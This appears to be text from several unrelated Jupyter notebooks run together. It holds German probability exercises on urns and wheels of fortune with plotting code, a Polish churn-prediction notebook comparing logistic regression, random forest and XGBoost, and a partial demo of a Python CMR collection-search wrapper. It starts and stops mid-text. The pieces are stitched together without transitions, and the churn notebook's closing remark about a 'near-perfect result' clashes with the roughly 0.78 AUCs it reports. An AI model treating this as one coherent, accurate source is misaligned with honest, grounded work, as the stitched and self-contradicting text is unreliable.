Oktaeders" betrachtet. Gesucht ist ihre Verteilung Das Zufallsexperiment kann mit den beiden ListenL4 = [1, 2, 3, 4]; L8 = list(range(1, 9)); L4, L8beschrieben werden; $X\,$ wird mittels einer ZG-Funktion definiertX = ZE(L4, L8, f=summe) X.vert X.hist2. Mehrkampfleistung eines SportlersDie Aufgabe wurde entnommen ausSIGMA Grundkurs StochastikErnst Klett Verlag 1982S. 76 Aufgabe 9Aus jeder der abgebildeten Urnen wird eine Kugel entnommen. Man interessiert sich für die Summe der darauf stehenden Zahlen(Über die Leistungen des Sportlers in den Einzeldisziplinen liegt statistischesMaterial vor. Eine Kugel mit der Nummer $i$ bedeutet, dass der Sportler für die entsprechende Leistung $90+i$ Punkte erhält ) Die Routine zur Herstellung der Grafik befindet sich am Ende des Notebooks)Ein Versuch erbringt 4 Kugeln, $X_i\,$ sei die Zufallsgröße, die der $i$. Kugel ihre Punktzahl zuordnet ($i = 1,2,3,4$). Die Verteilungen dieser Zufallsgrößen sind bekannt. Gesucht ist die Verteilung von $S = X_1+X_2+X_3+X_4$Folgende dict's beschreiben die UrnenL1 = {1:1, 2:1, 3:2, 4:5, 5:1} L2 = {1:4, 2:3, 3:2, 4:1} L3 ={1:2, 2:3, 3:1, 4:1, 5:3} L4 = {1:3, 2:1, 3:2, 4:1, 5:3}Die ZufallsGroesse wird aus dem 4-stufigen ZufallsExperiment erzeugt,dasauf diesen Listen basiert. Zur Addition der Einzelpunkte wird die Funktionsumme benutztS = ZE( L1, L2, L3, L4, f=summe)Erzeugung eines ZufallsGroesse-Objektes$S$ hat die Verteilung und das HistogrammS.vertInteressant ist auch der Vergleich mit der Normalverteilung, die mit dem (zwecksbesserer Einpassung mittels Versuch/Irrtum korrigierten) Erwartungswert und der Varianz von $S$ definiert wird (die betrachtete Zufallsgröße ist die Summe von vierZufallsgrößen)S.hist S.hist_(NV(S.erw-3, S.sigma)) # -3 - Verschiebung2. 
Zwei GlücksräderDie Aufgabe wurde entnommen aus Fischers AbiturwissenMathematikFischer Taschenbuch Verlag 2004S.327 Wir betrachten zwei Glücksräder Jemand bietet Ihnen zwei Spiele zur Auswahl an: Entweder dürfen Sie gegen ei-nen Einsatz von 3.50 € beide Glücksräder drehen und die Summe der Augenzahlen in € als Gewinn behalten, oder Sie dürfen gegen einen Einsatz von 3.50 € beideGlücksräder drehen und das Produkt der Augenzahlen in € als Gewinn behalten. Welches Spiel würden Sie wählen? Die beiden Glücksräder werden durch die ListenL1 = {0:90, 1:90, 2:60, 3:60, 4:60} L2 = {1:180, 2:60, 3:120}beschrieben (die rechten Zahlen sind die Öffnungswinkel der einzelnen Sekto-ren). Das zugrunde liegende ZufallsExperiment istGlücksRad(L1, L2)Die interessierende ZufallsGroesse $Summe$ = "Summe der Augenzahlen" kannauf der Grundlage dieses ZufallsExperimentes mit Hilfe der ZG-Funktion summeberechnet werdenSumme = GlücksRad(L1, L2, f=summe)Erzeugung eines ZufallsGroesse-ObjektesFür die ZufallsGroesse $Produkt$ = "Produkt der Augenzahlen" wird eine eigeneZG-Funktion benutztDazu dient hier eine sogenannte anonyme (unbenannte) lambda-Funktion; ihr Argument ist ein Element der Ergebnismenge in Listenform, berechnet wirddas Produkt der beiden ListenelementeProdukt = GlücksRad(L1, L2, f=lambda x: x[0]*x[1])Erzeugung eines ZufallsGroesse-ObjektesDie Histogramme der Wahrscheinlichkeitsverteilungen für die beiden Zufallsgrö-ßen sindSumme.hist; Produkt.histDie Wahrscheinlichkeitsverteilungen selbst sindSumme.vert Produkt.vertDie Erwartungswerte der beiden ZufallsGrößen sowie die Erwartungswertedes Gewinnes pro Spiel sind dann (in €)Summe.erw, Summe.erw - 3.50 Produkt.erw, Produkt.erw - 3.50Damit ist das Spiel um die Summe der Augenzahlen mit einem durchschnitt-lichen Gewinn von mehr als 8 cent günstig, während das Spiel um das Produktdurchschnittlich etwa 29 cent Verlust einbringt Grafik zu MehrkampfleistungHerstellung und Speicherung in einer Datei:import matplotlib.pyplot as plt import matplotlib.patches as patches def line(x, y): return plt.plot(x, y, color='blue', lw=1) r = 0.038 def kreis(x, y, n): k = patches.Circle((x, y+0.006), r, fill=None, edgecolor=(0,0,0), alpha=0.5) ax.add_patch(k) ax.text(x, y, str(n), fontsize=9, alpha=0.9, horizontalalignment='center', verticalalignment='center', fontname='Times new Roman') def urne(x, y): d = 0.4 line([x, x+d], [y, y]) line([x, x], [y, y+0.7*d]) line([x+d, x+d], [y, y+0.7*d]) plt.close('all') fig = plt.figure(figsize=(4, 2.5)) ax = fig.add_subplot(1, 1, 1, aspect='equal') ax.axis('off') plt.xlim(0.01, 1.3) plt.ylim(0.09, 1.01) d1 = 0.2 urne(0.096, 0.6) urne(d1+0.547, 0.6) urne(0.096, 0.15) urne(d1+0.547, 0.15) ax.text(0.3, 0.55, 'Urne 1', fontsize=10, alpha=0.9, horizontalalignment='center', verticalalignment='center', fontname='Times New Roman') kreis(0.3-4*r, 0.6+r, 1) kreis(0.3-2*r, 0.6+r, 2) for i in (1, 3): kreis(0.3, 0.6+i*r, 3) for i in (1, 3, 5, 7, 9): kreis(0.3+2*r, 0.6+i*r, 4) kreis(0.3+4*r, 0.6+r, 5) ax.text(d1+0.75, 0.55, 'Urne 2', fontsize=10, alpha=0.9, horizontalalignment='center', verticalalignment='center', fontname='Times New Roman') for i in (1, 3, 5, 7): kreis(d1+0.75-4*r, 0.6+i*r, 1) for i in (1, 3, 5): kreis(d1+0.75-2*r, 0.6+i*r, 2) for i in (1, 3): kreis(d1+0.75, 0.6+i*r, 3) kreis(d1+0.75+2*r, 0.6+r, 4) ax.text(0.3, 0.1, 'Urne 3', fontsize=10, alpha=0.9, horizontalalignment='center', verticalalignment='center', fontname='Times New Roman') for i in (1, 3): kreis(0.3-4*r, 0.15+i*r, 1) for i in (1, 3, 5): kreis(0.3-2*r, 0.15+i*r, 2) kreis(0.3, 
0.15+r, 3) kreis(0.3+2*r, 0.15+r, 4) for i in (1, 3, 5): kreis(0.3+4*r, 0.15+i*r, 5) ax.text(d1+0.75, 0.1, 'Urne 4', fontsize=10, alpha=0.9, horizontalalignment='center', verticalalignment='center', fontname='Times New Roman') for i in (1, 3, 5): kreis(d1+0.75-4*r, 0.15+i*r, 1) kreis(d1+0.75-2*r, 0.15+r, 2) for i in (1, 3): kreis(d1+0.75, 0.15+i*r, 3) kreis(d1+0.75+2*r, 0.15+r, 4) for i in (1, 3, 5): kreis(d1+0.75+4*r, 0.15+i*r, 5) #plt.savefig('mehrkampf.png') # ist bereits gespeichert #plt.show()Kontrollausgabe (in Markdown-Zelle) Grafik zu Glücksrädernimport matplotlib.pyplot as plt import matplotlib.patches as patches r = 1.1 gl1 = [1+r*cos(x), 1+r*sin(x)] gl2 = [4+r*cos(x), 1+r*sin(x)] def p1(w): return [el.subs(x, w) for el in gl1] def p2(wi): return [el.subs(x, wi) for el in gl2] def line(x, y): return plt.plot(x, y, color='black', lw=0.8) def text(x, y, n): ax.text(x, y, str(n), fontsize=9, alpha=0.9, horizontalalignment='center', verticalalignment='center', fontname='Times new Roman') plt.close('all') fig = plt.figure(figsize=(4, 2)) ax = fig.add_subplot(1, 1, 1, aspect='equal') ax.axis('off') plt.xlim(-0.2, 5.5) plt.ylim(-0.2, 2.2) kreis1 = patches.Circle((1, 1), 1.1, fill=None, edgecolor=(0,0,0), alpha=0.5) kreis2 = patches.Circle((4, 1), 1.1, fill=None, edgecolor=(0,0,0), alpha=0.5) ax.add_patch(kreis1) ax.add_patch(kreis2) for w in (0, pi/3, 2/3*pi, pi, 3/2*pi): p = [float(p1(w)[0]), float(p1(w)[1])] line([1, p[0]], [1, p[1]]) for w in (pi/2, 5/6*pi, 3/2*pi): p = [float(p2(w)[0]), float(p2(w)[1])] line([4, p[0]], [1, p[1]]) ax.arrow(0.85, 0.2, 0.335, 1.6, head_width=0.085, head_length=0.25, fc='b', ec='b') ax.arrow(3.85, 0.2, 0.335, 1.6, head_width=0.085, head_length=0.25, fc='b', ec='b') for t in [(0.5, 0.5, 0), (1.5, 0.5, 1), (1.6, 1.4, 2), (1, 1.7, 3), (0.4, 1.4, 4), \ (4.5, 1, 0), (3.7, 1.6, 1), (3.5, 0.5, 2)]: text(*t) #plt.savefig('gluecksraeder.png') # ist bereits gespeichert #plt.show()1. Import bibliotekimport numpy as np import pandas as pd from collections import Counter import matplotlib.pyplot as plt import math import seaborn as sns from matplotlib import font_manager as fm from sklearn.linear_model import LinearRegression from sklearn.model_selection import train_test_split from sklearn.preprocessing import StandardScaler import statsmodels.api as sm from sklearn.cluster import KMeans from sklearn.feature_selection import RFE from sklearn.ensemble import ExtraTreesClassifier from sklearn.feature_selection import SelectKBest from sklearn.feature_selection import f_classif from sklearn.linear_model import LogisticRegression import sklearn.metrics from sklearn.metrics import accuracy_score from sklearn.metrics import roc_auc_score from sklearn.metrics import confusion_matrix from sklearn.metrics import roc_curve from sklearn.ensemble import RandomForestClassifier from sklearn.model_selection import GridSearchCV from sklearn.pipeline import Pipeline from sklearn.model_selection import RepeatedStratifiedKFold import xgboost as xgb from xgboost import XGBClassifier from sklearn.model_selection import RandomizedSearchCV from sklearn.cluster import AgglomerativeClustering from scipy.cluster import hierarchy from scipy.cluster.hierarchy import dendrogram, linkage from sklearn.metrics import precision_recall_curve from sklearn.metrics import plot_precision_recall_curve from sklearn.metrics import precision_score from sklearn.metrics import recall_score2. Import bazy danychdf = pd.read_csv('train.csv')3. 
Podstawowe sprawdzeniadf.head() df.describe() df.info() RangeIndex: 4250 entries, 0 to 4249 Data columns (total 20 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 state 4250 non-null object 1 account_length 4250 non-null int64 2 area_code 4250 non-null object 3 international_plan 4250 non-null object 4 voice_mail_plan 4250 non-null object 5 number_vmail_messages 4250 non-null int64 6 total_day_minutes 4250 non-null float64 7 total_day_calls 4250 non-null int64 8 total_day_charge 4250 non-null float64 9 total_eve_minutes 4250 non-null float64 10 total_eve_calls 4250 non-null int64 11 total_eve_charge 4250 non-null float64 12 total_night_minutes 4250 non-null f[...]4. Podział zbioru na testowy i treningowytrain,test = train_test_split(df,test_size=0.3,stratify=df['churn']) print(f"Obserwacje w zbiorze treningowym: {len(train)}\nObserwacje w zbiorze testowym: {len(test)}\n")Obserwacje w zbiorze treningowym: 2975 Obserwacje w zbiorze testowym: 12755. Sprawdzenie zmiennej celutrain['churn'].value_counts(normalize=True) fig = plt.figure(1, figsize=(5,5)) ax = fig.add_axes([0.1, 0.1, 0.8, 0.8]) plt.title('Rozkład zmiennej churn', fontsize=20) patches, texts, autotexts = ax.pie(train['churn'].value_counts(), labels=['no', 'yes'], autopct='%1.1f%%', shadow=True, startangle=140, colors=['lightpink', 'paleturquoise']) proptease = fm.FontProperties() proptease.set_size('xx-large') plt.setp(autotexts, fontproperties=proptease) plt.setp(texts, fontproperties=proptease) plt.show()6. Opisowa analiza danych 6.1 Kolumny znakowe i zero-jedynkowetrain['state'].value_counts() train['area_code'].value_counts() char_cols = ['area_code','state','international_plan','voice_mail_plan'] for i in char_cols: cross = pd.crosstab(train[i], train['churn']) totals = [i+j for i,j in zip(cross['no'], cross['yes'])] yes = [i/j * 100 for i,j in zip(cross['yes'],totals)] no = [i/j * 100 for i,j in zip(cross['no'], totals)] barWidth = 0.85 r = cross.index plt.figure(figsize=(20,7)) colors = {0:'lightpink', 1:'paleturquoise'} labels = list(colors.keys()) handles = [plt.Rectangle((0,0),1,1, color=colors[label]) for label in labels] plt.bar(r, yes, color='paleturquoise', width=barWidth) plt.bar(r, no, bottom=yes, color='lightpink', width=barWidth) plt.legend(handles, labels) plt.xticks(r) plt.xlabel(i) plt.title(i) plt.show() #stan NJ ma więcej i CA a najmniej ma AK a area_code jest podobnie6.2 Kolumny numerycznenum_cols = [i for i in train.columns if i not in char_cols and i!= 'churn'] num_cols for i in num_cols: a_df = pd.DataFrame() a_df[i + '_yes'] = (train[train['churn'] == 'yes'][['churn', i]].describe())[i] a_df[i + '_no'] = (train[train['churn'] == 'no'][['churn',i]].describe())[i] print(i) print(a_df) print('') #średnie i mediana porównując yes i no chyba że mocno będą różnić się min/max for i in num_cols: plt.hist(train[i]) plt.title(i) plt.show()7. 
Podstawowe przekształcenia danych 7.1 Zmiana danych yes/no na 1/0zmienneYesNo = ['international_plan','voice_mail_plan','churn'] for zmienne in zmienneYesNo: train[zmienne] = np.where(train[zmienne] == 'yes', 1, 0) test[zmienne] = np.where(test[zmienne] == 'yes', 1, 0) train.head()7.2 Dumifikacja kolumn znakowych - przekształcenie ich do kolumn 0/1to_dummify=['state','area_code'] for i in to_dummify: dummy = pd.get_dummies(train[i], prefix = i) dummy_test = pd.get_dummies(test[i], prefix = i) mask = pd.DataFrame(train[i].value_counts(sort=True)).index[0] dummy.drop(i+'_'+mask, inplace=True, axis=1) dummy_test.drop(i+'_'+mask, inplace=True, axis=1) train = pd.concat([train,dummy], axis=1) test = pd.concat([test, dummy_test], axis=1) train.drop(i, inplace=True, axis=1) test.drop(i, inplace=True, axis=1) train.head() #czy jest jedna mniej zmienna test.head()7.3 Wybór zmiennych, których udział jest większy niż 1,5%bin_col = list() for i in train.columns: if (len(train[i].value_counts()) == 2) & (i != 'churn'): bin_col.append(i) bin_col zdegenerowane = [] for col in bin_col: x = train[col].value_counts() / train[col].value_counts().sum() print(" ") print(col) print(x) if x.iloc[0] <= 0.015 or x.iloc[1] <= 0.015: print(col) print(x) zdegenerowane.append(col) zdegenerowane #wyrzucam zmienne powstałe w wyniku dumifikacji których jednej z kategorii jest mniejszy bądź równy 1,5%. Tak duża dysproporcja mogłaby #sprawić, że ta zmienna nie różnicowałaby zmiennej celu train.drop(zdegenerowane,axis=1,inplace=True) test.drop(zdegenerowane,axis=1,inplace=True)7.4 Badanie korelacji ze zmienną celubazaCorr=train.corr() np.abs(bazaCorr['churn']).sort_values(ascending=False)[0:30] #zadna zmienna nie jest silnie skorelowana z zmienna celu, wiec zadnej nie usuwam (zadna nie jest podejrzana)7.5 Badanie korelacji pomiędzy zmiennymi objaśniającymitarget = 'churn' skorelowane = [] for i in train.columns: for j in train.columns: if i != j and np.abs(bazaCorr[i][j]) >= 0.7: if i not in skorelowane and j not in skorelowane: if abs(bazaCorr[i][target]) < abs(bazaCorr[target][j]): skorelowane.append(i) else: skorelowane.append(j) skorelowane #Sprawdzam korelacje między zmiennymi objaśniającymi - jeżeli między nimi występuje zależność r > 0.7 to sprawdzam, która ze zmiennych #jest bardziej skorelowana ze zmienną celu - zostawiam tą z większym współczynnkiem korelacji pearsona train.drop(skorelowane,axis=1,inplace=True) test.drop(skorelowane,axis=1,inplace=True) #usuwam te zmienne7.6 Identyfikacja zmiennych nie różnicujących zmiennej celubin_col = list() for i in train.columns: if (len(train[i].value_counts()) == 2) & (i != 'churn'): bin_col.append(i) notdiff =[] for i in bin_col: table=train[[i, target]].groupby([i], as_index=False).mean().sort_values(by=target, ascending=False) print('--------------------------------------') print(i) print(table) print(' ') diff = 100* (table.loc[0,target] - table.loc[1, target]) / table.loc[0,target] print('Różnica: ', diff) if abs(diff) <= 10: notdiff.append(table.columns[0]) #Jeżeli różnica między udziałem zdarzeń w obu kategoriach jest mniejsza niż 10%, to je usuwam - zakładam, że zmienne o mniejszej #różnicy nie są istotnie różnicujące notdiff train.drop(notdiff,axis=1,inplace=True) test.drop(notdiff,axis=1,inplace=True) #usuwam len(train.columns)8. 
Wybór zmiennych do modelu 8.1 Podział zbioru X_train, X_test, y_train, y_testX_train = train.drop('churn',axis=1) X_test = test.drop('churn',axis=1) y_train = train['churn'] y_test = test['churn'] model = ExtraTreesClassifier(n_estimators=12) model.fit(X_train, y_train) print(model.feature_importances_) features_tree_ = pd.DataFrame(model.feature_importances_, index=X_train.columns,columns=['values']).sort_values('values',ascending=False)[0:20] features_tree_ features_tree_.plot(kind='bar',color='darkviolet',figsize=(12,8)) plt.title('Najważniejsze zmienne') plt.xticks(rotation=70) important_features = features_tree_[0:12].index9. Budowa modelu 9.1 Undersamplingfrom imblearn.under_sampling import ClusterCentroids cc = ClusterCentroids(random_state=0) X_resampled, y_resampled = cc.fit_resample(X_train, y_train) X_resampled_pd = pd.DataFrame(X_resampled, columns=X_train.columns) y_resampled_pd = pd.DataFrame(y_resampled) y_train.value_counts() y_resampled.value_counts() def evaluateModel(alg, X_train, Y_train, X_test, Y_test, treshold): #Fit the algorithm on the data alg.fit(X_train, Y_train) #Predict test set: X_test_predictions = alg.predict(X_test) X_test_predprob0 = alg.predict_proba(X_test) X_test_predprob = alg.predict_proba(X_test)[:,1] for i in range(len(X_test_predprob)): if X_test_predprob[i] >= treshold: X_test_predprob[i] = 1 else: X_test_predprob[i] = 0 print("AUC Score: " + str(roc_auc_score(Y_test, X_test_predprob0[:,1]))) print("Accuracy Test: " + str(accuracy_score(Y_test, X_test_predictions))) print("Precision: " + str(precision_score(Y_test, X_test_predprob))) print("Recall: " + str(recall_score(Y_test, X_test_predprob))) confMatrix=confusion_matrix(Y_test, X_test_predprob) confMatrix=pd.DataFrame(confMatrix) confMatrix.columns=[['Predicted 0','Predicted 1']] confMatrix.index=[['True 0','True 1']] print('') print('Confusion Matrix:') print('') print(confMatrix) print('Accuracy Matrix:') Accuracy_Matrix=100*confMatrix.div(confMatrix.sum(axis=1),axis=0) print(Accuracy_Matrix) print('') return X_test_predprob09.2 Model regresji logistycznej 9.21 Ewaluacja modelu przed undersamplingiemX_test[important_features] log_reg = LogisticRegression(max_iter=200) print('TRAIN set') evaluateModel(log_reg, X_train[important_features], y_train, X_train[important_features], y_train, 0.5) print('') print('TEST set') preds_lr = evaluateModel(log_reg, X_train[important_features], y_train, X_test[important_features], y_test, 0.5)TRAIN set AUC Score: 0.7908183655099519 Accuracy Test: 0.8682352941176471 Precision: 0.6097560975609756 Recall: 0.17899761336515513 Confusion Matrix: Predicted 0 Predicted 1 True 0 2508 48 True 1 344 75 Accuracy Matrix: Predicted 0 Predicted 1 True 0 98.122066 1.877934 True 1 82.100239 17.899761 TEST set AUC Score: 0.7841312237491335 Accuracy Test: 0.8611764705882353 Precision: 0.5166666666666667 Recall: 0.17318435754189945 Confusion Matrix: Predicted 0 Predicted 1 True 0 1067 29 True 1 148 31 Accuracy Matrix: Predicted 0 Predicted 1 True 0 97.354015 2.645985 True 1 82.681564 17.3184369.22 Ewaluacja modelu po undersamplingulog_reg = LogisticRegression(max_iter=200) print('TRAIN set') evaluateModel(log_reg, X_resampled_pd[important_features], y_resampled_pd , X_resampled_pd[important_features], y_resampled_pd, 0.9) print('') print('TEST set') preds_lr_samp = evaluateModel(log_reg, X_resampled_pd[important_features], y_resampled_pd, X_test[important_features], y_test, 0.9)TRAIN set AUC Score: 0.8762595337233212 Accuracy Test: 0.8186157517899761 Precision: 0.98125 Recall: 
0.3747016706443914 Confusion Matrix: Predicted 0 Predicted 1 True 0 416 3 True 1 262 157 Accuracy Matrix: Predicted 0 Predicted 1 True 0 99.284010 0.715990 True 1 62.529833 37.470167 TEST set AUC Score: 0.7852933980344982 Accuracy Test: 0.6329411764705882 Precision: 0.4022346368715084 Recall: 0.4022346368715084 Confusion Matrix: Predicted 0 Predicted 1 True 0 989 107 True 1 107 72 Accuracy Matrix: Predicted 0 Predicted 1 True 0 90.237226 9.762774 True 1 59.776536 40.2234649.23 Porownanie modelu regresji logistycznej przed undersamplingiem i pofpr1, tpr1, thresholds1 = roc_curve(y_test, preds_lr[:,1]) fpr2, tpr2, thresholds2 = roc_curve(y_test, preds_lr_samp[:,1]) plt.figure(figsize=(15,10)) plt.title("Logistic Regression ROC Curve") plt.plot([0, 1], [0, 1], linestyle='--', color='grey') plt.plot(fpr1, tpr1, label='without sampling', color='hotpink') plt.plot(fpr2, tpr2, label='undersampling', color='darkturquoise') plt.legend(loc="upper left") plt.xlabel("False positive rate") plt.ylabel("True positive rate") plt.show() #pomimo ze krzywe ROC sa podobne a miary AUC sa podobne, to jednak precyzja dla modelu bez undersamplingu dla roznych punktow #odciecia jest lepsza niz dla modelu po undersamplingu (model z undersamplingiem duzo klasyfikuje jako FP), dlatego decyduje sie #na odrzucenie modelu z undersamplingiem9.24 Optymalizacja modelu regresji logistycznejmodel = LogisticRegression(max_iter=1000) solvers = [ 'lbfgs', 'liblinear'] penalty = ['l1', 'l2'] c_values = [100, 10, 1.0, 0.1, 0.01] grid = dict(solver=solvers,penalty=penalty,C=c_values) cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=3, random_state=1) grid_search = GridSearchCV(estimator=model, param_grid=grid, n_jobs=-1, cv=cv, scoring='accuracy',error_score=0) grid_result = grid_search.fit(X_train[important_features], y_train) print("Best: %f using %s" % (grid_result.best_score_, grid_result.best_params_)) #Zoptymalizowane parametry regresji logistycznej log_reg = LogisticRegression(max_iter=1000,C=0.1,penalty='l2',solver='lbfgs') print('TRAIN set') evaluateModel(log_reg, X_train[important_features], y_train, X_train[important_features], y_train, 0.5) print('') print('TEST set') preds_lr_opt = evaluateModel(log_reg, X_train[important_features], y_train, X_test[important_features], y_test, 0.5) fpr1, tpr1, thresholds1 = roc_curve(y_test, preds_lr[:,1]) fpr2, tpr2, thresholds2 = roc_curve(y_test, preds_lr_opt[:,1]) plt.figure(figsize=(15,10)) plt.title("Logistic Regression ROC Curve") plt.plot([0, 1], [0, 1], linestyle='--', color='grey') plt.plot(fpr1, tpr1, label='not optimized', color='hotpink') plt.plot(fpr2, tpr2, label='optimized', color='darkturquoise') plt.legend(loc="upper left") plt.xlabel("False positive rate") plt.ylabel("True positive rate") plt.show() #Po optymalizacji parametrów regresji logistycznej obszar pod krzywa ROC jest znaczaco wiekszy9.3 Model random forestrf = RandomForestClassifier() print('TRAIN set') evaluateModel(rf, X_train[important_features], y_train, X_train[important_features], y_train, 0.5) print('TEST set') preds_rf = evaluateModel(rf, X_train[important_features], y_train, X_test[important_features], y_test, 0.5) #na regresji z undersamplingiem bylo gorzej, wiec tutaj juz nie sprawdzam dla danych undersamplingowych param_grid1 = { 'max_depth': np.arange(3,20,1), 'max_features': ["auto", "sqrt", "log2"] } rf = RandomForestClassifier() grid_search = GridSearchCV(estimator = rf, param_grid = param_grid1, cv = 3, n_jobs = -1, verbose = 2) grid_search.fit(X_train[important_features],y_train) 
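# The random forest is tuned in stages rather than with one large grid: max_depth and max_features
# first (above), then min_samples_leaf / min_samples_split, then n_estimators, each stage fixing
# the best values found so far. This keeps every GridSearchCV run small.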
grid_search.best_params_, grid_search.best_score_ param_grid2 = { 'min_samples_leaf': [3, 4, 5, 10], 'min_samples_split': [3, 8, 10, 12] } rf = RandomForestClassifier(max_depth=19, max_features='log2') grid_search2 = GridSearchCV(estimator = rf, param_grid = param_grid2) grid_search2.fit(X_train[important_features],y_train) grid_search2.best_params_, grid_search2.best_score_ param_grid3= { 'n_estimators': [100, 200, 300, 1000] } rf = RandomForestClassifier(max_depth=19, max_features='log2', min_samples_leaf=3, min_samples_split=8) grid_search3 = GridSearchCV(estimator = rf, param_grid = param_grid3, cv=5) grid_search3.fit(X_train[important_features],y_train) grid_search3.best_params_, grid_search3.best_score_ rf = RandomForestClassifier(max_depth=19, max_features='log2', min_samples_leaf=3, min_samples_split=8,n_estimators=200) print('TRAIN set') evaluateModel(rf, X_train[important_features], y_train, X_train[important_features], y_train, 0.5) print('TEST set') preds_rf_opt = evaluateModel(rf, X_train[important_features], y_train, X_test[important_features], y_test, 0.5) fpr1, tpr1, thresholds1 = roc_curve(y_test, preds_rf[:,1]) fpr2, tpr2, thresholds2 = roc_curve(y_test, preds_rf_opt[:,1]) plt.figure(figsize=(15,10)) plt.title("Random forest model before and after tuning") plt.plot([0, 1], [0, 1], linestyle='--', color='grey') plt.plot(fpr1, tpr1, label='Random forest before tuning', color='hotpink') plt.plot(fpr2, tpr2, label='Random forest after tuning', color='darkturquoise') plt.legend(loc="upper left") plt.xlabel("False positive rate") plt.ylabel("True positive rate") plt.show() #optymalizacja niezbyt wplynela, oba sa bardzo podobne fpr1, tpr1, thresholds1 = roc_curve(y_test, preds_rf[:,1]) fpr2, tpr2, thresholds2 = roc_curve(y_test, preds_lr_opt[:,1]) plt.figure(figsize=(15,10)) plt.title("Random forest vs Regresja Logistyczna") plt.plot([0, 1], [0, 1], linestyle='--', color='grey') plt.plot(fpr1, tpr1, label='Random forest', color='hotpink') plt.plot(fpr2, tpr2, label='Regresja logistyczna', color='darkturquoise') plt.legend(loc="upper left") plt.xlabel("False positive rate") plt.ylabel("True positive rate") plt.show() #Po powyzszym wykresie widac, ze las losowy jest zdecydowanie lepszy od modelu regresji logistycznej9.4 Model XGBoostxg_boost_1 = XGBClassifier(objective= 'binary:logistic') print('TRAIN set') evaluateModel(xg_boost_1, X_train[important_features], y_train, X_train[important_features], y_train, 0.5) print('TEST set') preds_xgb = evaluateModel(xg_boost_1, X_train[important_features], y_train, X_test[important_features], y_test, 0.3) param_test1 = { 'max_depth': np.arange(3,20,1), 'min_child_weight': np.arange(1,6,1), } gsearch1 = GridSearchCV(estimator = XGBClassifier(objective= 'binary:logistic'), param_grid = param_test1, scoring='roc_auc',n_jobs=4,iid=False, cv=5) gsearch1.fit(X_train[important_features],y_train) gsearch1.best_params_, gsearch1.best_score_ param_test2 = { 'gamma': [i/10.0 for i in range(0,5)] } gsearch2 = GridSearchCV(estimator = XGBClassifier( max_depth=3, min_child_weight=2, objective= 'binary:logistic'), param_grid = param_test2, scoring='roc_auc',n_jobs=4,iid=False, cv=5) gsearch2.fit(X_train[important_features],y_train) gsearch2.best_params_, gsearch2.best_score_ param_test3= { 'subsample':[i/10.0 for i in range(6,10)], 'colsample_bytree':[i/10.0 for i in range(6,10)] } gsearch3 = GridSearchCV(estimator = XGBClassifier( max_depth=3, min_child_weight=2, gamma=0, objective= 'binary:logistic'), param_grid = param_test3, 
scoring='roc_auc',n_jobs=4,iid=False, cv=5) gsearch3.fit(X_train[important_features],y_train) gsearch3.best_params_, gsearch3.best_score_ param_test4= { 'reg_alpha':[1e-5, 1e-2, 0.1, 1, 100] } gsearch4 = GridSearchCV(estimator = XGBClassifier( max_depth=3, min_child_weight=2, gamma=0, colsample_bytree = 0.6, subsample= 0.9, objective= 'binary:logistic'), param_grid = param_test4, scoring='roc_auc',n_jobs=4,iid=False, cv=5) gsearch4.fit(X_train[important_features],y_train) gsearch4.best_params_, gsearch4.best_score_ xg_boost_1 = XGBClassifier(max_depth=3, min_child_weight=2, gamma=0, colsample_bytree = 0.6, subsample= 0.9, objective= 'binary:logistic',reg_alpha=1) print('TRAIN set') evaluateModel(xg_boost_1, X_train[important_features], y_train, X_train[important_features], y_train, 0.5) print('TEST set') preds_xgb_opt = evaluateModel(xg_boost_1, X_train[important_features], y_train, X_test[important_features], y_test, 0.3) fpr1, tpr1, thresholds1 = roc_curve(y_test, preds_xgb[:,1]) fpr2, tpr2, thresholds2 = roc_curve(y_test, preds_xgb_opt[:,1]) plt.figure(figsize=(15,10)) plt.title("Model XGBoost przed i po optymalizacji") plt.plot([0, 1], [0, 1], linestyle='--', color='grey') plt.plot(fpr1, tpr1, label='XGBoost przed optymalizacja', color='hotpink') plt.plot(fpr2, tpr2, label='XGBoost po optymalizacji', color='darkturquoise') plt.legend(loc="upper left") plt.xlabel("False positive rate") plt.ylabel("True positive rate") plt.show() fpr1, tpr1, thresholds1 = roc_curve(y_test, preds_rf[:,1]) fpr2, tpr2, thresholds2 = roc_curve(y_test, preds_xgb_opt[:,1]) plt.figure(figsize=(15,10)) plt.title("Random forest vs XGBoost po optymalizacji") plt.plot([0, 1], [0, 1], linestyle='--', color='grey') plt.plot(fpr1, tpr1, label='Random forest', color='hotpink') plt.plot(fpr2, tpr2, label='XGBoost po optymalizacji', color='darkturquoise') plt.legend(loc="upper left") plt.xlabel("False positive rate") plt.ylabel("True positive rate") plt.show() #AUC is the same for the XGBoost and Random Forest models; recall is better for XGBoost, but precision is better for Random Forest #The models are very similar, and choosing either one would not be a mistake #If this were real data, such a near-perfect result should raise suspicion. It is unlikely to be achievable on real #data unless an undesirable (leaky) variable were accidentally included #To summarize, our dataset contained no missing values. We started with a descriptive analysis, which #provided basic insights into the data. Next, variables that did not significantly affect the target variable were #excluded from the set. Finally, we carried out an analysis to select an appropriate predictive #model. The best model is Random Forest or XGBoost.Python Wrapper for CMR`A Python library to interface with CMR - Collection Search Demo`This demo will show how to perform a **collection** search against CMR while inside a notebook. Loading the libraryFrom the command line, make sure you call `runme.sh -p -i` to both package and install the library through pip3. Load modulesimport cmr.search.collection as collGet Online HelpAt least some understanding of the CMR API will be needed from time to time; to assist with that, the following call can be used to open a browser window to the API.
For the fun of it, you can pass in an HTML anchor tag on the page and jump directly there.coll.open_api()Searching Perform A Basic SearchSearch for all records that contain the word 'salt'.results = coll.search({'keyword':'salt'}) print("Found {} records.".format(len(results))) for i in results: print (i)A Search with columns filtered from the resultReduce the result columns by showing only the collection curation fields and dropping the entry title. This search also queries the UAT environment.params = {} #params['provider'] = 'SEDAC' # 276 records #params['keyword'] = 'fish food' # 131 records params['keyword'] = 'salt' # 290 records config={'env':'uat'} # 290 in prod, 49 in UAT as of 2020-12-01 results = coll.search(params, filters=[coll.collection_core_fields, coll.drop_fields('EntryTitle')], limit=1000, config=config) print("Found {} records.".format(len(results))) for i in results: print (i)Find a lot of collection recordsThis should find just over a full page (2000) of results.params = {} results = coll.search(params, filters=[coll.collection_core_fields, coll.drop_fields('EntryTitle')], limit=2048, config={'env':'uat'}) print("Found {} records.".format(len(results))) for i in results: print (i)Applying Filters after a searchInternally the code calls apply_filters(), but it can also be called manually as shown below. One reason to do this is to download the data once and then apply filters as needed.params = {} raw_results = coll.search(params, limit=2, config={'env':'uat'}) clean_results = 